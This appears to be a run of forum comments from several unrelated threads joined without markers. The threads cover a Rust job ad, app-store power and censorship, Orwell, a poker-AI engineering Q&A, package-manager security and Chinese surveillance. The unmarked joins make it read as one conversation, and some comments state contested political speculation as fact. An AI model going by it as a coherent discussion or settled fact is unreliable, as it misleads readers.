Rust Project/Foundation | Program Manager | Remote
Rust is a programming language that helps people build reliable and efficient software at scale. It's a language that many people love.
The members of the Rust Project work together to build and advance this language and its related tooling and infrastructure. We take a particular pride in shipping tools that are stable and well polished.
We've lately been doing more explicit program management as part of our ongoing work to improve and scale our processes for shipping our language and these high quality tools. We've developed systems and standards for this that have proven to work well within the Rust Project, and we've been seeing substantial value from this work being done in the context of our edition and project goal programs.
We're now looking to hire some sharp and talented individuals to support and advance these systems and this work. That's where you come in.
For details on this role, and how to contact us about it, see here:
Here's the thing. Even if you're OK with Apple (or whoever) controlling what you can run on your computers, this is a centralization of power that will be co-opted.
Let's say that Australia wants to ban consumer encryption. This would currently be difficult to enforce for PC software. But on mobile, this is easy. Just make Apple and Google enforce it! Make them ban such apps from their stores. Now you've achieved perfect enforcement on Apple hardware. Even on Android, where people could in theory side-load the banned apps, this would prevent those apps from achieving any scale or network effect.
That's what I think people are missing here. No matter how much you trust Apple, once the mechanisms for this kind of power are in place, you won't be able to control what happens next.
Apple already actively censors political content in apps and actively works with Chinese government to censor content on Chinese AppStore.
A private company is already put themselves in plate to control software content that reaches millions of people without those people having the ability to choose anything else on their pocket computers.
> Apple already actively censors political content in apps...
This is true, which is why I surprised the other day when I found this app called "BLMovement" when I was looking around to see if anyone was making a completely distasteful joke...
Lest your comment suggest the author of this article isn't aware of this point, he has made this argument precisely:
> Whereas China needed to control country-wide Internet access to achieve its censorship goals, Apple and Google have helpfully provided the Indian government with a one-stop shop. This also, for better or worse, gives a roadmap for how the U.S. government could respond to TikTok, if it chose to: there is no need to build a great firewall — simply give the order to Apple and Google. Centralization, at least from a central government’s perspective, has its uses.
I don't think you are using two points that are similar enough.
If Australia bans encryption, you as a consumer who resides in Australia has a high switching cost (moving, new job, residence, etc.) and thus the consumer loses out.
If Apple starts to use that power badly... you can switch to a number of competitor feature phones with largely the same feature and app capabilities (Android being the most obvious)
In a market with 2+ competitors and where its low switching costs (moving contacts is quite easy these days, not a lot of deep 2-year contracts for phones/providers) this point doesn't hold true
The points are not supposed to be similar... you're missing the part of the parent's argument where one is used as a tool to enforce the other, when otherwise it would be difficult/impossible to enforce.
There is only one real competitor: Android. Google would very much like to have the same degree of control that Apple does over their ecosystem, but they're holding back for now so that they can point to Apple as being worse when the congressional inquiries heat up.
Feature phones are not real competitors to smartphones.
I'd argue there is a third competitor in the form of Huawei/Xiaomi. Despite fears of spying by the Chinese, which might be justified, their phones tend to have better prices all the way to the ultra market, and due to the fact that they want to allow you to sideload GsmCore and Play Services, will never be locked down.
>If Australia bans encryption, you as a consumer who resides in Australia has a high switching cost (moving, new job, residence, etc.) and thus the consumer loses out.
>If Apple starts to use that power badly... you can switch to a number of competitor feature phones with largely the same feature and app capabilities (Android being the most obvious)
It depends, network are effects are strong on Apple (iMessage) and maybe you already bought tons of apps and software that you can't transfer to Android or Windows.
"you can switch to a number of competitor feature phones with largely the same feature and app capabilities"
How much does that cost? How does it work if the apps you rely on are iOS only? How do I transfer my app and subscription purchases to my new Android phone?
> But on mobile, this is easy. Just make Apple and Google enforce it!
This is exactly how Indian government has banned tiktok. They are never able to ban websites because the web is open. But apps they can ban easily because if Apple/Google say no, they will be squeezed.
As part of selling on Apple's app store, you agree to follow the ToS. The ToS are very clear that you don't set up your own marketplace inside your app where Apple doesn't get a cut. This reaction (terminating Epic's account) was eminently foreseeable and completely justified. You do not fuck with Apple's cut. Don't like it, don't sell on the app store.
Epic thought they were big enough and valuable enough that they could bully their way through ToS violations. All the hip thinkpieces were saying that no matter what happens here Epic comes out on top, because Apple has everything to lose and blah blah.
Turns out nope, Epic's customers do need the app store after all, so Apple has the leverage here after all.
George Orwell covered this basic point in `1984` (published in 1949):
> The aims of these three groups are entirely irreconcilable. The aim of the High is to remain where they are. The aim of the Middle is to change places with the High. The aim of the Low, when they have an aim -- for it is an abiding characteristic of the Low that they are too much crushed by drudgery to be more than intermittently conscious of anything outside their daily lives -- is to abolish all distinctions and create a society in which all men shall be equal. Thus throughout history a struggle which is the same in its main outlines recurs over and over again. For long periods the High seem to be securely in power, but sooner or later there always comes a moment when they lose either their belief in themselves or their capacity to govern efficiently, or both. They are then overthrown by the Middle, who enlist the Low on their side by pretending to them that they are fighting for liberty and justice. As soon as they have reached their objective, the Middle thrust the Low back into their old position of servitude, and themselves become the High. Presently a new Middle group splits off from one of the other groups, or from both of them, and the struggle begins over again.
It's pretty common to Christian, especially Protestant, theology and culture.
"There is neither Jew nor Gentile, neither slave nor free, nor is there male and female, for you are all one in Christ Jesus. If you belong to Christ, then you are Abraham’s seed, and heirs according to the promise."
And that principle is the often (most?) quoted part of the Declaration of Independence:
"We hold these truths to be self-evident, that all men are created equal, that they are endowed by their Creator with certain unalienable Rights, that among these are Life, Liberty and the Pursuit of Happiness."
A few years later, the U.S. Constitution banned titles of mobility. We are probably overdue to follow up with nixing professional titles and titles for government officials (Mr. President, Your Honor, etc.).
It's not clear to me that Orwell was saying that. And neither of the passages I vite are talking about laws as such. The Declaration of Independence was certainly extralegal, and perhaps it is more foundational than any given body of law, even.
That's a pretty political bent on things, especially if you are considering the protestant world view:
"For it is by grace you have been saved, through faith--and this not from yourselves, it is the gift of God -- not by works, so that no one can boast." (book of Ephesians)
The text (and theology) clearly divorce the outcome from the work being done. Frankly a plan reading of the text would be sympathetic to socialism (also see the day of Pentecost, the parable of the workers, etc..). It's very tortured to suggest that somehow this is actually a libertarian "pull yourself up" world view.
I know, the idea that we'd all be born into more or less equal stations and afforded the more or less the same opportunities, is a thought too frightening to behold amiright?
Or tip the balances of power between the 3 groups.
It seems in the last 10+ years, social media empires and big tech have done just that. It seems to me, the High turned the Middle and Low against each other.
So the idea behind this is what? That you shouldn't trust the revolutionaries because they dont have your interests in mind? That its hopeless? This model of the world is just run of the mill statusquoism trying to make people too despondent to tear down hierarchy, not some deep truth.
To be honest I dont know if Orwell agreed with the position of the high or not, but the fact people repeat this propaganda of the "high" from 1984 is absurd.
You absolutely shouldn't trust the revolutionists who tell you to die for their causes. Revolutions and chaos in general make most people's lives worse off, hence why they tend to happen when peoples' lives are so bad that they can't possibly get worse than status quo.
That doesn't mean revolutions are bad from a system point of view, they serve as reboots for a system plagued with memory leaks.
Orwell's biography is so famous that we can guess the basics of how he would answer this: revolutionaries don't necessarily have your interests in mind; it's not hopeless; oppose the status quo; don't be blinded by ideology; be honest before being political.
Which biography are you referring to? I’m seeing a few. I didn’t know it was famous and never thought to check, but would definitely like to read now that you mention it.
P.S. it’s always a treat to stumble on a non-moderator comment from dang
Oh, by biography I just meant his life story. I didn't have a specific book in mind.
Orwell is famous for having been early to break with political allies whose tactics he abhorred, even though they were fighting for his side. He had a genius for intellectual honesty, which made his writing exceptionally clear. If there's a clearer writer in English I wonder who it is.
I've read it as we repeat a cycle where people are always far up on top and the only way to break that cycle is to be content with more or less everyone being in or near the middle.
Or put another way: So long as there is a high that people can day dream about becoming then there will never be equality for the majority of people. Otherwise people will get into the high places, slam the door shut as soon as they can, and the fighting and day dreaming will continue.
I agree with your sentiment and I am probably on the lower end of the middle class now, coming from a working class family, but I can't find a way to avoid that someone will get more than me by simply not caring about obeying the rules.
If you have more resources you can buy your exemptions from the law.
Probably from someone who can be "bought" because that money is a significant amount compared to what usually earns.
I hoped in this third Industrial revolution to free us up from labor, but it looks like people don't get it well when you tell them "your job doesn't exist anymore" even if it's generally a good thing.
"The Fourth Industrial Revolution" is one of the most successfully lobbied and marketed instruments of our time. It has preoccupied governments and distracted them from addressing existing inequalities.
Alternatively it can be seen as a lesson for the low to not allow the middle to use them as a weapon. If they want to avoid this same result they'd need to take over their own revolution, not be led by the middle.
By Orwell’s definition you can’t depend on The Low to defend themselves
> The aim of the Low, when they have an aim -- for it is an abiding characteristic of the Low that they are too much crushed by drudgery to be more than intermittently conscious of anything outside their daily lives
On the large scale, I think Orwell's view is correct. The pattern always repeats itself.
However on the individual level, you can reap the benefits of the revolutions and will die before the next cycle, so there's always at least some incentive to challenge the status quo.
It doesn't change the fact that it's hopeless on the large scale.
Technology has the potential of flattening the social hierarchy somewhat. Or more likely it gives some an out even if they can't get the social status they want -- like making it easier for one to live a life cut off from immediate social circles (and status competition). Anonymous online association is an example that comes to mind.
> That you shouldn't trust the revolutionaries because they dont have your interests in mind? That its hopeless?
If you've read Orwell's Homage to Catalonia, chronicling his experience in the Spanish Civil War on the side of the socialists, I think that's a reasonable interpretation of his position.
Could you perhaps speak to some of the engineering details that the paper glosses over. E.g.:
- Are the action and information abstraction procedures hand-engineered or learned in some manner?
- How does it decide how many bets to consider in a particular situation?
- Is there anything interesting going on with how the strategy is compressed in memory?
- How do you decide in the first betting round if a bet is far enough off-tree that online search is needed?
- When searching beyond leaf nodes, how did you choose how far to bias the strategies toward calling, raising, and folding?
- After it calculates how it would act with every possible hand, how does it use that to balance its strategy while taking into account the hand it is actually holding?
- In general, how much do these kind of engineering details and hyperparameters matter to your results and to the efficiency of training? How much time did you spend on this? Roughly how many lines of code are important for making this work?
- Why does this training method work so well on CPUs vs GPUs? Do you think there are any lessons here that might improve training efficiency for 2-player perfect-information systems such as AlphaZero?
We tried to make the paper as accessible as possible. A lot of these questions are covered in the supplementary material (along with pseudocode).
- Are the action and information abstraction procedures hand-engineered or learned in some manner?
- How does it decide how many bets to consider in a particular situation?
The information abstraction is determined by k-means clustering on certain features. There wasn't much thought put into the action abstraction because it turns out the exact sizes you use don't matter that much as long as the bot has enough options to choose from. We basically just did 0.25x pot, 0.5x pot, 1x pot, etc. The number of sizes varied depending on the situation.
- Is there anything interesting going on with how the strategy is compressed in memory?
Nope.
- How do you decide in the first betting round if a bet is far enough off-tree that online search is needed?
We set a threshold at $100.
- When searching beyond leaf nodes, how did you choose how far to bias the strategies toward calling, raising, and folding?
In each case, we multiplied by the biased action's probability by a factor of 5 and renormalized. In theory it doesn't really matter what the factor is.
- After it calculates how it would act with every possible hand, how does it use that to balance its strategy while taking into account the hand it is actually holding?
This comes out naturally from our use of Linear Counterfactual Regret Minimization in the search space. It's covered in more detail in the supplementary material
- In general, how much do these kind of engineering details and hyperparameters matter to your results and to the efficiency of training? How much time did you spend on this? Roughly how many lines of code are important for making this work?
I think it's all pretty robust to the choice of parameters, but we didn't do extensive testing to see. While these bots are quite easy to train, the variance is so high in poker that getting meaningful experimental results is relatively quite computationally expensive.
- Why does this training method work so well on CPUs vs GPUs? Do you think there are any lessons here that might improve training efficiency for 2-player perfect-information systems such as AlphaZero?
I think the key is that the search algorithm is picking up so much of the slack that we don't really need to train an amazing precomputed strategy. If we weren't using search, it would probably be infeasible to generate a strong 6-player poker AI. Search was also critical for previous AI benchmark victories like chess and Go.
The security of package managers is something we're going to have to fix.
Some years ago, in offices, computers were routinely infected or made unusable because the staff were downloading and installing random screen savers from the internet. The IT staff would have to go around and scold people not to do this.
If you've looked at the transitive dependency graphs of modern packages, it's hard to not feel we're doing the same thing.
In the linked piece, Russ Cox notes that the cost of adding a bad dependency is the sum of the cost of each possible bad outcome times its probability. But then he speculates that for personal projects that cost may be near zero. That's unlikely. Unless developers entirely sandbox projects with untrusted dependencies from their personal data, company data, email, credentials, SSH/PGP keys, cryptocurrency wallets, etc., the cost of a bad outcome is still enormous. Even multiplied by a small probability, it has to be considered.
As dependency graphs get deeper, this probability, however small, only increases.
One effect of lower-cost dependencies that Russ Cox did not mention is the increasing tendency for a project's transitive dependencies to contain two or more libraries that do the same thing. When dependencies were more expensive and consequently larger, there was more pressure for an ecosystem to settle on one package for a task. Now there might be a dozen popular packages for fancy error handling and your direct and transitive dependencies might have picked any set of them. This further multiplies the task of reviewing all of the code important to your program.
Linux distributions had to deal with this problem of trust long ago. It's instructive to see how much more careful they were about it. Becoming a Debian Developer involves a lengthy process of showing commitment to their values and requires meeting another member in person to show identification to be added to their cryptographic web of trust. Of course, the distributions are at the end of the day distributing software written by others, and this explosion of dependencies makes it increasingly difficult for package maintainers to provide effective review. And of course, the hassles of getting a library accepted into distributions is one reason for the popularity of tools such as Cargo, NPM, CPAN, etc.
It seems that package managers, like web browsers before them, are going to have to provide some form of sandboxing. The problem is the same. We're downloading heaps of untrusted code from the internet.
After using Go and Dart on a number of projects and using very few dependencies (compared to JavaScript projects) I'd say a good starting point is having a great standard library.
For example, it's a bit ridiculous that in 2019 we cannot decode a JWT using a simple browser API, still need Moment for time and date operations, there is no observable type (a 4 year old proposal is still in draft stage), and still no native data-binding.
The TC39 is moving too slowly and that's one of the reasons why NPM is so popular.
I mean, even all of those examples you listed aren't as crazy as the fact that you need a library to parse the cookie string and deal with individual cookies...
> Becoming a Debian Developer involves a lengthy process of showing commitment to their values and requires meeting another member in person to show identification to be added to their cryptographic web of trust
At the very least. More often people receive mentoring for months and meet in person.
> this explosion of dependencies makes it increasingly difficult for package maintainers to provide effective review
It makes packaging extremely time consuming and that's why a lot of things in Go and javascript are not packaged.
The project cares about security and compliance to licensing.
> ... the increasing tendency for a project's transitive dependencies to contain two or more libraries that do the same thing. When dependencies were more expensive and consequently larger, there was more pressure for an ecosystem to settle on one package for a task. Now there might be a dozen popular packages for fancy error handling and your direct and transitive dependencies might have picked any set of them.
It's not just a security problem. It also hampers composition, because when two libraries talk about the same concept in different "terms"/objects/APIs (because they rely on two different other libraries to wrap it), you have to write a bridge to make them talk to each other.
That's why large standard libraries are beneficial - they define the common vocabulary that third-party libraries can then use in their API surface to allow them to interoperate smoothly.
> The security of package managers is something we're going to have to fix.
why the generalization? lot of package manager have been serviceable for decades, their security model based solely on verifying the maintainer identity with clients deciding which maintainer to trust.
this is of course an issue with all package manager, but it's the lack of trusted namespacing that makes it easy to fall into it. (there's scope which sound similar but the protection model of the scope name is currently unclear to me and it's optional anyway)
compare to maven, where a package prefix gets registered along with a cryptographic key and only the key holder can upload to it to the central repo.
sure you get malicious packages going around, but it's far easier not to fall into it because it's significantly harder to get user to download a random package off the namespaces he knows
> We're downloading heaps of untrusted code from the internet.
this is not something a package manager can fix, it's a culture problem. even including a gist or something off codepen is dangerous. a package manager cannot handle the 'downloading whatever' issue, it's not reasonable to put that in its thread model, because no package management maintainer can possibly guarantee that there is no malicious code in its repository and it's not its role anyway. a package manager is there to get a package to you as it was published at a specific point in time identified by its versioning, and its threat model should be people trying to publish packages under someone else name.
speaking of which it took npm 4 years to prevent people to publish a package with new code under an existing version number: https://github.com/npm/npm-registry-couchapp/issues/148 - they eventually came to sense but heck the whole node.js ecosystem gung-ho attitude is scary.
> why the generalization? lot of package manager have been serviceable for decades, their security model based solely on verifying the maintainer identity with clients deciding which maintainer to trust.
What happens when the maintainer of a package changes?
The big problem I see happening is maintainers getting burned out and abandoning their packages, and someone else taking over. You might trust the original maintainer, but do you get notified of every change in maintainer?
> The security of package managers is something we're going to have to fix.
Companies that care about this already have dependency policies in place. The companies that don't care so much about security already have an approach to security problems that they will employ if a significant threat is revealed, spend time and money to fix it then.
It's a herd approach. Sheep and cattle band together because there's strength in numbers and the wolves can only get one or two at a time. It's extremely effective at safeguarding most of the flock.
>Companies that care about this already have dependency policies in place. The companies that don't care so much about security already have an approach to security problems that they will employ if a significant threat is revealed, spend time and money to fix it then.
I think that probably the majority of companies actually fall into a third group: Those who don't really care enough about this but also don't really have a good policy for dealing with it.
> It's instructive to see how much more careful they were about it.
"Much more careful" would have been a requirement to consult upstream on all patches that are beyond the maintainer's level of expertise. Especially so for all patches that potentially affect the functioning of cryptographic libraries.
Debian has had a catastrophe to show the need for such a guideline. Do they currently have such a guideline?
If not it's difficult to see the key parties as little more than security theatre.
> The security of package managers is something we're going to have to fix.
Inclusiveness and the need for Jeff Freshman and Jane Sophomore to have a list of 126 GitHub repos before beginning their application process for an intern job is at odds with having vetted entities as package providers.
When I was developing Eclipse RCP products, I had three or five entities that provided signed packages I used as dependencies.
Plus: with npm, you even have tooling dependencies, so the former theoretical threat of a malicious compiler injecting malware is now the sad reality[0].
I'm not claiming the "old way" is secure, but the "new way" is insecure by design and by policy (inclusiveness, gatekeeping as fireable offense).
[0] I have tooling dependencies in Gradle and Maven too, but again, these are by large vendors and not by some random resume padding GitHub user.
I'm a big fan of kitchen sink frameworks for this reason. Whenever I want to do something in JS the answer is to install a package for it. When I want to do something in rails the answer is its built in. I have installed far far fewer packages for my back end than the frontend and the back end is vastly more complex
TLDR: it boils down to analysing dependencies at the level of the callgraph; but building those callgraphs isn't easy. The benefit in the security use case is ~3x increased accuracy when identifying vulnerable packages (by eliminating false positives).
This right here is why Go's 'statically link everything' is going to become a big problem in the long run when old servers are running that software and no one has the source code anymore.
i dont see how that's true. in both worlds, a developer has to take the manual action to review published vulnerabilities and track down repos they own that are affected and upgrade the dependencies.
No: with dynamic linking, and especially with Linux distributions, most of the work is automated and the patching is done by the distribution security team.
The time to write a patch and deliver it to running systems goes down to days or, more often, hours.
Cautiously posting that link, because I'm not against vendoring. You just need a process around keeping your dependencies up to date / refreshed automatically. The ability to vendor is one thing, how you use it is another.
It would be nice if our compilers had the ability to directly incorporate the source code into the binary in some standard way. E.g. on Win32, it could be a resource, readily extractable with the usual resource viewer. On Unix, maybe just a string constant with a magic header, easy to extract via `strings`. And so on.
I agree this would be positive. But the source only get's you halfway there though, you still need to actually be able to reproduce a compatible build system. And the longer ago the software was originally developed, the more challenging that becomes.
There are lot's of old projects out there relying on some ancient VS2003 installation. Same will happen with modern languages in a decade - code goes stale, and it get's more and more difficult to pull down the versions of software it was originally built with.
I hate (read: love) to be pedantic, but all scripting languages already have this feature built-in, and thanks to modern VMs and JIT compilers and the like, performance is much less of an issue.
It would be interesting to see e.g. a Go executable format that ships with the source, build tools and documentation that would compile to the current platform on demand. Should be doable in a Docker image at least.
No one's going to waste resources putting source code on the server dude, they'll host it somewhere else and then something will happen to it or they just won't see the need to give the source to anyone because they're the only people in the company who understand it anyway etc.
Given the ease with which the parser and AST are made available to developers, we should be able to implement tools which can detect naughty packages. Also, given the speed at which projects can be compiled, the impetus to keep the source code should remain strong.
> we should be able to implement tools which can detect naughty packages
We can! It's one thing to know that there's no major technical obstacle to having a security-oriented static analysis suite for your language of choice. It's quite another for one to actually have already been written.
The primary wrinkle tends to be around justifying the cost of building one. For companies that use small languages, that means a non-trivial cost in engineer time just to get a research-grade scanner. For companies whose products are security scanners, it means waiting until there's a commercial market for supporting a language.
This is a problem I've been struggling with. I sympathize a great deal with developers who want to use the newest, most interesting, and above all most productive tools available to them. This stacks up awkwardly against the relatively immature tooling ecosystem common in more cutting-edge languages with smaller communities and less corporate support.
Granted. But it will at least raise the bar for building an exploit package from "knows how to code" to "knows how to code, knows something about exploits, and knows how to avoid detection by an automated scanner."
It really depends on how the developers work; if they know the software will have to run for 10+ years, mostly unmaintained / unmonitored, they can opt to vendor all the dependencies so that a future developer can dive into the source of said dependencies.
Also, the Go community tends to frown at adding superfluous dependencies - this is a statement I got while looking for web API frameworks. Said frameworks are often very compact as well, a thin wrapper around Go's own APIs.
I've also worked on a project which had to be future-proofed solidly; all documentation for all dependencies had to be included with the source code.
The basic problem is that what he was doing for the first 12 months was right. Doing what a big company executive would have done would have been wrong.
When the new CEO comes in and wants things done immediately in the big company way, it's going to feel like the new guy is saying he was doing everything wrong. Further, the actions he was taking will be perceived by others in the company and by new management as his identity rather than as a rational response to the circumstances of the early company.
A smart and observant person in such a role might come around over time naturally. He or she would notice that what worked early on isn't working as well any longer and would adapt. That may even be better for the company than going overnight from "small company mode" to "big company mode".
Or the person may not come around. Either way, it's likely change will not be perceived as fast enough. Difficult problem for all parties.
>He or she would notice that what worked early on isn't working as well any longer and would adapt.
I've seen a few execs not be able to do this, so I don't really blame the CEO in this situation. They did fine and dandy as the product started out but were flailing in the wind once we got big enough.
I saw more companies collapse at that stage because they decided that they are now a new kind of company that needs to scale than I saw companies that collapsed because they did not scale fast enough.
In the West we have a false sense of security that totalitarianism will inevitably fail. We've seen so many examples of fallen tyrannical states. But many ideas fail the first few times they're tried. China seems committed to making totalitarianism "work."
It's hard to think of any more dangerous invention. Even nuclear weapons aren't as dangerous as a sustainable model for modern tyrannical government.
This is an invention that would be exported and widely adopted.
The liberal democratic model of government spread around the world not just because the people saw it work in America and decided that's what they wanted, but also because the ruling aristocrats saw that it would be net better for them. The French Revolution probably helped convince them it compared favorably to the guillotine.
If another model is pioneered and proven that's better for the ruling class, it won't be difficult to find regimes eager to adopt it.
I very much doubt it is sustainable. The cost of policing is quite substantial and the productivity lost is hard to replace which adds to the cost.
What we are seeing today is essentially a low intensity conflict[0] not unlike what took place in white Rhodesia/Namibia, Northern Ireland during the troubles, etc. There is a economic reason why these conflicts could not last indefinitely, no matter what ideologies drive them.
Technology is making the price plummet of policing a large population. Natural language recognition, face recognition, location tracking, pattern-matching, deep packet inspection, graph traversal, and of course AI can all run unattended pointing out dissidents to the authorities who just have to go round them up and reeducate them. Oh and guess what China is making a big investment in lately?
TBH, AI worries me because it removes much of the human cooperation required to keep such regimes in place, however it is probably still a few decades ahead of us.
The false-positive/negative rates are the key here. If they are not too bad, then yeah, it may 'work' in the short term. If they are sky high, like most facial recognition is today, then it's not going to work. Word will leak out very quickly that the surveillance is worthless.
For an authoritarian police state, false positives are fine as a show of force.
If the system mistakes you for someone else, you might get your door kicked down, your dog shot, and get dragged in and interrogated. Then you will come to realize what will happen if you really run afoul of them. So maybe you think twice if you're planning an infraction in the future.
So they may well want to round up the top N suspects, knowing that N-1 are innocent.
Yes, but this is a separate issue than surveillance. You can have totalitarianism and surveillance just as well as with democracy (not ever typical though).
Ancient Egypt seems to be the exception in history. Such reliable agriculture and continued population concentration around the Nile are very peculiar situations that have no parallels elsewhere.
If Egypt was truly superior, it really should not have been so easily conquered by Ptolemy and then Rome which both had a much less authoritarian society.
> I very much doubt it is sustainable. The cost of policing is quite substantial and the productivity lost is hard to replace which adds to the cost.
Why do you think the Chinese government can't sustain the cost? Intensive policing is manpower intensive, and China presently has manpower to spare. They also don't have to deal with democratic pressures to contain the cost and redirect the savings to programs that benefit the general public.
In my view, they are not sustaining the cost. We are, by buying their products. If totalitarianism becomes universal, that's when it ceases to be sustainable.
The ruling class has luxuries that they could not have developed for themselves without them being broadly available. I'm thinking of things like cell phones, the Internet, and possibly the money system.
I love that we're talking about how bad totalitarianism is meanwhile we literally have the upperclass exporting jobs to China for a quick buck and president who campaigned on bringing them back who just betrayed his base (and his country) by helping a Chinese company keep their jobs... Living in the free-ist country in the world apparently means you're free to sell out your fellow man to the totalitarian state overseas.
I think _that_ is the sustainability problem we need to talk about. We're feeding them and starving ourselves.
That's correct. Due to the one-child policy and other causes, China is already suffering a worker shortage, and the demographers say it will get much worse in the future.
Your argument does not preclude selective policing; if for example policing on Han ethnicities remains sufficiently light, this can remain indefinitely. Slavery as well as oppression of minorities used to be seen as part and parcel of human society; one should not doubt so easily that oppressive regimes can be sustainable
Northern Ireland (in the 1900s) was less about resistance to a tyrannical state, and much more about a population split 50/50ish who had hated each other for a few hundred years. British action there was far from exemplary, but had the people of Northern Ireland woken up one day to find they were part of the Republic of Ireland, precisely no problems would have been solved.
China has a social credit system that is locked in with this totalitarian system. Based on how irrational humans are I fully expect a huge spike in suicides. Once people get into so much social debt that people stop associating with them and they are locked out of work and simple things such as garbage collection they will start to end their lives.
I want to be wrong about suicide and right about social credit systems though....
What if you're wrong? You have doubts, where's the evidence?
> What we are seeing today is essentially a low intensity conflict
This part I don't see at all. Who are the sides in this low intensity conflict? The examples in Wikipedia are distinct identities or states. What identities are in contention in China?
>What if you're wrong? You have doubts, where's the evidence?
I am not in the clairvoyant business. Expressing doubt is as much as I could do.
>This part I don't see at all. Who are the sides in this low intensity conflict?
Armed insurrection has been ongoing on since the early 90s[0] loosely organised by ETIM[1] as well as various affiliated Islamist groups in neighboring countries especially of late. They are backed by sympathetic donors in the Gulf states, Turkey and (allegedly) the CIA. Since then there have been several high profile riots and terrorist attacks both in[2] and out[3] of Xinjiang.
Obviously they are fighting against the police and the army loyal to the government. In addition there are local entities known as Bingtuan[4] that are best described as a military-industrial complex with several company towns at strategic locations throughout the region. They are under the direct command of the state department and are expected to counter the provincial leadership should they become insubordinate.
There are also smaller groups of Hui (Chinese Muslims) seeking to consolidate their identity and Kazakh irredentists seeking reunification with Kazakhstan, but they are much less significant and tend to be allied with he government against the Uighur.
> What if you're wrong? You have doubts, where's the evidence?
There's not enough data to make predictions like that. But one very good reason for optimism is that China's current totalitarian stability is an unstable false vacuum. It's sustained by the outrageously rapid economic growth seen in the decades since the cultural revolution.
Basically: if you're Chinese, your grandparents (if they were lucky) survived a devastating world war and invasion by Japan, an even more devastating civil war, and a yet more devastating still famine forced on them by the nutjobs who won the civil war.
And now their grandkids are all running around with smartphones in their pockets, collecting college diplomas and international graduate degrees, vacationing in Thailand and Hawaii, and generally dancing on the world stage like the Americans do.
That kind of success pays for a lot of totalitarian angst. But it won't forever. These folks' kids aren't going to be happy with only 2% GDP growth as payment for their political dominance by a corrupt elite. The proletariat never has been.
The Chinese proletariat isn’t running around the world colecting foreign graduate degrees; they are working in factories in Shenzhen to feed their children back in the village. But you’re right in that it’s typically privileged young people who are behind liberal revolutions.
I think if the state enlists and coopts a sufficient percentage of the local population, then it can work indefinitely, if the gov't provides enough in terms of basic needs. The idea of local administrative committees and youth organizations as an arm to make others toe the line is not a foreign concept to the CCP.
There really isn't one when most of the Uighur population is impoverished if not otherwise disaffected, and the local Han population are effectively incentivised to leave Xinjiang for better prospects elsewhere. Between 2010 and 2013, there have been 400,000 fewer Han Chinese living in Xinjiang through a combination of natural population decline and emigration[0]; this represents a solid 2% of total population and there is no evidence to suggest the trend is slowing down.
Heavy policing may put a lid on the problem for now but in the long run it will only undo several generations of hard work pacifying the region.
I see what you are saying. I think there are ways to do it. The Soviets were successful in their central Asian and Caucasus "Republics". They tended to coopt a local leader and got them to do their bidding. Even Russia now with Chechnya has been able to use the same formula. It's not impossible for the CCP to do the same.
One could argue that “totalitarianism” was the default government form for most of history.
The problem is, the higher we go on the Maslow pyramid, the more likely it is for it to fail. You just can’t have a huge mass of creative, inventive people without them complaining about leadership (and wanting to improve it).
And totalitarianism by definition has problems accepting criticism.
The only way for totalitarianism to “work” is if the rulers are both much smarter than the population as a whole and also benevolent.
Regarding China, let’s see. These kinds of regimes don’t fail immediately. Just the cracks get bigger and bigger. From what I heard there’s a consolidation of power going on, that’s generally a sure sign of the first cracks appearing.
>The only way for totalitarianism to “work” is if the rulers are both much smarter than the population as a whole and also benevolent.
I dont think thats realistic anymore. Once they are able to hit first and hit hard when opposition forms, they are pretty much untouchable.
The whole argument, of autocratic regimes having a higher chance of collapsing the longer the reign looks like a naive outdated approach to me.
It bets on a critical mass of opposition forming. With total surveillance this wont happen.
A successful mass protest has to start somewhere. If you arrest those first people willing to risk everything you quell the entire thing. Its the basic concept of 1984. The only thing holding back this dystopia was the lack of a big brother state with sufficient insight.
There mass surveillance back then was child's play in comparison what is possible today. There is a tipping point which is hopefully still in the future, where dissent is detectable and predictable enough that regimes are no longer at risk to collapse.
If you look at collapses of authoritarian regimes due to public pressure, they happen to a similar pattern. A small group of people start a protest and depending on how hated the regime is and how bad the living condition for most people are, others will join in, the more the less likely it becomes for them to be individually picked out.
This only works if the initial small group has enough time to motivate enough people to join in so that it snowballs. Earlier approaches were to minimize the time the small groups had to snowball with quick and hard actions, but with more and more surveillance, it becomes possible to target people even before they join. At a certain point it becomes possible to watch over every last citizen and target anyone who might be willing to start something like this in the future.
The amount of protests in China has been exploding over the past decade(s). I didn't even know until someone mentioned it on here a few months back, but iirc its gone from maybe a few thousand per year in the 90s to well over 100,000 in recent years.
The Chinese rich I've interacted with are also (in my experience, at least - I don't have stats to support this) really ignorant of how bad a lot of their countrymen have it. A friend of mine's father is some sort of government official in a tier 1 or 2 city, and he's told me that the rich and poor are segregated enough that he himself didn't even realize his family was anything other than middle class until he came to Canada and saw it wasn't exactly normal to have parents who can afford 100k+ annual tuition, luxury cars and apartments, etc.
> You just can’t have a huge mass of creative, inventive people without them complaining about leadership (and wanting to improve it).
You create an upper middle class for the "creatives" and you restrict the areas of creativity to military and industrial use.
Most well off people that I know are happy to think the poor deserve to be poor and repressed (different people have different reasons for justifying it. Few seen to really care).
Nothing is forever. The current regime in China won't be forever either. The question is how long.
After Augustus Rome still had a couple of hundred years of expansion where a nationalist could argue, “hey look at that! Things are still going good.” But they couldn’t outrun the rot in the system forever.
After Xi will China get another strongman? I think this is the key. If there are a series of total dictators things will decay. Whatever justifications a dictator uses for their rules, ultimately they are going to try to implement policies that keep themselves on top first.
This is a great point. Xi is a strongman dictator and has arguably harmed Communist rule a lot more than he realizes by eliminating term limits. If the next ruler is some fool who cannot handle the crises that a country inevitably faces... it could lead to the country's undoing.
Which is why I am personally a lot more alarmed at the current US Presidency than most of my peers. Inept rulers have historically been the best predictors of a civilization's downfall. The fervent opposition to the administration by ordinary US citizens gives me hope but if Republicans continue to hold on to power after November, I really do feel that all will be lost.
That didn’t work for the USSR, why would it work for China? As long as some things are off limits / as long as people know they arn’t alowed to research this or that, then they’ll be at a long term disadvantage to those that do.
China was here before. Cutting yourself off from the world just means you eventually find yourself having fallen behind everyone else.
> That didn’t work for the USSR, why would it work for China?
The CCP does have the benefit of learning from the failures of the Soviets.
> China was here before. Cutting yourself off from the world just means you eventually find yourself having fallen behind everyone else.
That mainly happened because they were so dominant in their sphere that they didn't bother themselves with far off areas that seemed primitive to them. I'm pretty sure the CCP has learned from that mistake.
> If they had learned from that mistake they wouldn’t be trying to wall the internet off.
They're walling off foreign political ideas and avenues for domestic political organization, not foreign technological advancements. They are very explicit about that.
Do we actually need creative inventive people? Maybe at some point we run low on truly innovative new ideas that are truly practical. Maybe we just start re-skinning the old ideas and selling them for no real benefit, and could do without the whole process. Maybe that's already in the process of happening.
